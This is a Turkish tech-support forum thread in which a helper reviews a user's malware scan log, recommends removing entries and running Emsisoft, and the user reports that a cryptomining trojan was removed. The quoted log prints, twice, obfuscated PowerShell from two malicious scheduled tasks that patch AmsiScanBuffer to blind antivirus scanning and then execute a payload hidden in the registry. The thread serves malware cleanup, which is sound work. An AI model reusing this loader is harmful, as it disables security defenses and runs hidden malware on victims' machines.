O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe (file missing)
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService
Debug information:
- 06.03.2022 21:58:01 - LoadFileToStream - #0 LastDllError = 225 () CreateFile C:\Windows\Tasks\nslooksvc32.job
- 06.03.2022 21:58:01 - ParseJob. Unable to open file: C:\Windows\Tasks\nslooksvc32.job - #0 LastDllError = 0
- 06.03.2022 21:58:01 - LoadFileToStream - #0 LastDllError = 225 () CreateFile C:\Windows\Tasks\nslooksvc64.job
- 06.03.2022 21:58:01 - ParseJob. Unable to open file: C:\Windows\Tasks\nslooksvc64.job - #0 LastDllError = 0
--
End of file - Time spent: 13,7 sec. - 32926 bytes, CRC32: FFFFFFFF. Sign: 䕥趉[/CODE]
acv
Megapat
- Katılım
- 31 Temmuz 2015
- Mesajlar
- 7.594
- Makaleler
- 1
- Çözümler
- 74
Bunları fixleyin.
Aktif zararlının silinmiş olması lazım. Kaspersky'i tekrar kurarak test edebilirsiniz. Ayrıyeten aşağıdaki araçla sisteme tam tarama yapmanızı öneririm.
www.emsisoft.com
Kod:
O22 - BITS Job: (download) {2982ED1B-9DF7-4A96-8A4F-AF6135D30AB2} - http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fay7bjcbpgagtaithciieeva4u_20220222.431134436/obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3 -> C:\Users\muhan\AppData\Local\Temp\chrome_BITS_9464_2144227497\obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) nslooksvc32.job - (no file)
O22 - Task (.job): (disabled) nslooksvc64.job - (no file)
O22 - Task: (damaged) C:\Windows\System32\Tasks\McAfee (empty)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc32 (key missing)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc64 (key missing)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky Lab\upgrade_launcher.exe /waitUpgrade (file missing)
O22 - Task: nslooksvc32 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$paalNHZeNmu.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');$paalNHZeNmu.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$trxeVYymQW,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');Write-Output $paalNHZeNmu.CreateType();}$esKTVjEbEydev=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$BLsWUgXPabQYEv=$esKTVjEbEydev.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zhDFYQRlKZJklGZhJlg=KUUibsYzdVVZ @([String])([IntPtr]);$HouUUsVdZbZakOwaaqnUNb=KUUibsYzdVVZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FjTfoJARZLM=$esKTVjEbEydev.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$qIROLtoHyfQMRl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Load'+'LibraryA')));$BzKZfVwvYaCgfQTdI=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Vir'+'tual'+'Pro'+'tect')));$gqDzMuu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qIROLtoHyfQMRl,$zhDFYQRlKZJklGZhJlg).Invoke('a'+'m'+'si.dll');$thgHnFpRwqzfvbdgl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$gqDzMuu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$tFojzPMnml=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,4,[ref]$tFojzPMnml);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$thgHnFpRwqzfvbdgl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,0x20,[ref]$tFojzPMnml);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: nslooksvc64 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$XEsJbemsTkG.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');$XEsJbemsTkG.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LjtIPhnXDu,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');Write-Output $XEsJbemsTkG.CreateType();}$EznyfjngDAhAs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$sYOssrpLYJJpjX=$EznyfjngDAhAs.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAfmdyFNvhcWtryWFmg=yZzuiYRezadz @([String])([IntPtr]);$iyqMBNsEEaEwzblKaRROoC=yZzuiYRezadz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LUQEzwkExfi=$EznyfjngDAhAs.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$vESqRXeDRnNXMw=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Load'+'LibraryA')));$gsFUORhqEFVSkXOmO=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Vir'+'tual'+'Pro'+'tect')));$MyWMWhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vESqRXeDRnNXMw,$aAfmdyFNvhcWtryWFmg).Invoke('a'+'m'+'si.dll');$SNXmKatLTctWUQlcY=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$MyWMWhO,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VNvaCoBJHL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,4,[ref]$VNvaCoBJHL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SNXmKatLTctWUQlcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,0x20,[ref]$VNvaCoBJHL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe (file missing)Aktif zararlının silinmiş olması lazım. Kaspersky'i tekrar kurarak test edebilirsiniz. Ayrıyeten aşağıdaki araçla sisteme tam tarama yapmanızı öneririm.
Emsisoft - Emergency Kit: Free Portable Malware Scan and Removal
Emsisoft Emergency Kit is the ultimate free anti-malware and antivirus tool to scan, detect and remove viruses, keyloggers and other malware threats.
www.emsisoft.com
KS
KS
AlreadyBroken494
Hectopat
- Katılım
- 21 Nisan 2021
- Mesajlar
- 103
- Çözümler
- 1
Daha fazla
- Cinsiyet
- Erkek
Bunları fixleyin.
Kod:O22 - BITS Job: (download) {2982ED1B-9DF7-4A96-8A4F-AF6135D30AB2} - http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fay7bjcbpgagtaithciieeva4u_20220222.431134436/obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3 -> C:\Users\muhan\AppData\Local\Temp\chrome_BITS_9464_2144227497\obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3 O22 - BITS Job: Fix all (including legit) O22 - Task (.job): (disabled) nslooksvc32.job - (no file) O22 - Task (.job): (disabled) nslooksvc64.job - (no file) O22 - Task: (damaged) C:\Windows\System32\Tasks\McAfee (empty) O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc32 (key missing) O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc64 (key missing) O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft) O22 - Task: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky Lab\upgrade_launcher.exe /waitUpgrade (file missing) O22 - Task: nslooksvc32 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$paalNHZeNmu.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');$paalNHZeNmu.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$trxeVYymQW,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');Write-Output $paalNHZeNmu.CreateType();}$esKTVjEbEydev=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$BLsWUgXPabQYEv=$esKTVjEbEydev.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zhDFYQRlKZJklGZhJlg=KUUibsYzdVVZ @([String])([IntPtr]);$HouUUsVdZbZakOwaaqnUNb=KUUibsYzdVVZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FjTfoJARZLM=$esKTVjEbEydev.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$qIROLtoHyfQMRl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Load'+'LibraryA')));$BzKZfVwvYaCgfQTdI=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Vir'+'tual'+'Pro'+'tect')));$gqDzMuu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qIROLtoHyfQMRl,$zhDFYQRlKZJklGZhJlg).Invoke('a'+'m'+'si.dll');$thgHnFpRwqzfvbdgl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$gqDzMuu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$tFojzPMnml=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,4,[ref]$tFojzPMnml);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$thgHnFpRwqzfvbdgl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,0x20,[ref]$tFojzPMnml);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)" O22 - Task: nslooksvc64 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$XEsJbemsTkG.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');$XEsJbemsTkG.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LjtIPhnXDu,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');Write-Output $XEsJbemsTkG.CreateType();}$EznyfjngDAhAs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$sYOssrpLYJJpjX=$EznyfjngDAhAs.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAfmdyFNvhcWtryWFmg=yZzuiYRezadz @([String])([IntPtr]);$iyqMBNsEEaEwzblKaRROoC=yZzuiYRezadz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LUQEzwkExfi=$EznyfjngDAhAs.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$vESqRXeDRnNXMw=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Load'+'LibraryA')));$gsFUORhqEFVSkXOmO=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Vir'+'tual'+'Pro'+'tect')));$MyWMWhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vESqRXeDRnNXMw,$aAfmdyFNvhcWtryWFmg).Invoke('a'+'m'+'si.dll');$SNXmKatLTctWUQlcY=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$MyWMWhO,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VNvaCoBJHL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,4,[ref]$VNvaCoBJHL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SNXmKatLTctWUQlcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,0x20,[ref]$VNvaCoBJHL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)" O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe (file missing)
Aktif zararlının silinmiş olması lazım. Kaspersky'i tekrar kurarak test edebilirsiniz. Ayrıyeten aşağıdaki araçla sisteme tam tarama yapmanızı öneririm.
Emsisoft - Emergency Kit: Free Portable Malware Scan and Removal
Emsisoft Emergency Kit is the ultimate free anti-malware and antivirus tool to scan, detect and remove viruses, keyloggers and other malware threats.
Hocam fixleme kısmını anlayamadım onun dışında önerdiğiniz malware sihost64.exe adında bir trojan buldu internetten araştırdım mining virüsü olduğu yazıyordu tek tıkla sildi sıkıntı çıkartmadı. Yardımların için çok teşekkür ederim.
TSM_KARAM
Centipat
- Katılım
- 18 Mart 2023
- Mesajlar
- 215
- Çözümler
- 1
Daha fazla
- Sistem Özellikleri
- İşlemci: i9 9900k Ram:Kingston DDR5 128GB(4x32GB) 5200MHz CL40 EkranKartı:
PNY NVIDIA QUADRO RTX 6000 24GB GDDR6 384BİT (VCQRTX6000-P arçelik kasa
- Cinsiyet
- Erkek
Format en temizidir.
